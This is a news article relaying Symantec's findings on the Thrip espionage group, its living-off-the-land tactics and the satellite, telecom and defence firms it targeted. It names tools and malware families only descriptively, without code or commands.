A Chinese cyber-hacking group is thought to have hacked a number of companies in the satellite, telecom and defence industries in the US and Southeast Asia, it has emerged.

A Chinese cyber-hacking group is thought to have hacked a number of companies in the satellite, telecom and defence industries in the US and Southeast Asia, it has emerged.


According to security researchers at Symantec, the campaign originated from machines based in mainland China.


Dubbed Thrip by researchers, the group has been operating since 2013, making use of operating system features or legitimate network administration tools to compromise victims’ networks. 


“The purpose of living off the land is twofold. By using such features and tools, attackers are hoping to blend in on the victim’s network and hide their activity in a sea of legitimate processes. Secondly, even if malicious activity involving these tools is detected, it can make it harder to attribute attacks,” said researchers in a blog post. 


There are four key targets of Thrip. First, a satellite communications operator, suggesting that motives go beyond spying and may also include disruption. Second, the hackers are going after geospatial imaging and mapping, mainly in the operational side of the company, targetting computers running MapXtreme GIS (Geographic Information System) software which is used for integrating location-based data into other applications. It also targeted machines running Google Earth Server and Garmin imaging software.


The hackers have also targeted three different telecoms operators, all based in Southeast Asia – in all cases, based on the nature of the computers infected by Thrip, it appeared that the telecoms companies themselves and not their customers were the targets of these attacks. A fourth target of interest was a defence contractor.


Researchers said the hackers used legitimate tools such as PsExec: Microsoft Sysinternals tool for executing processes on other systems. The tool was primarily used by the attackers to move laterally on the victim’s network.


Hackers also used Powershell to run commands to download payloads, traverse compromised networks, and carry out reconnaissance. They also made use of Mimikatz, a freely available tool capable of changing privileges, exporting security certificates, and recovering Windows passwords in plaintext; WinSCP, an open source FTP client used to exfiltrate data from targeted organisations; and LogMeIn. With the last tool, Symantec said it was unclear whether the attackers gained unauthorised access to the victim’s LogMeIn accounts or whether they created their own.


These legitimate tools were used to install custom malware, such as Trojan.Rikamanu, Infostealer.Catchamas, Trojan.Mycicil, Backdoor.Spedear, and Trojan.Syndicasec.


Researchers said it detected the attacks using its Targeted Attack Analytics (TAA) tool that uses artificial intelligence and machine learning to spot patterns associated with targeted attacks. This AI tool detected unusual activity in January this year. 


“This is likely espionage,” said Greg Clark, Symantec CEO. “The Thrip group has been working since 2013 and their latest campaign uses standard operating system tools, so targeted organisations won’t notice their presence. They operate very quietly, blending in to networks, and are only discovered using artificial intelligence that can identify and flag their movements. Alarmingly, the group seems keenly interested in telecom, satellite operators, and defence companies.”

This article originally appeared at scmagazineuk.com

Source link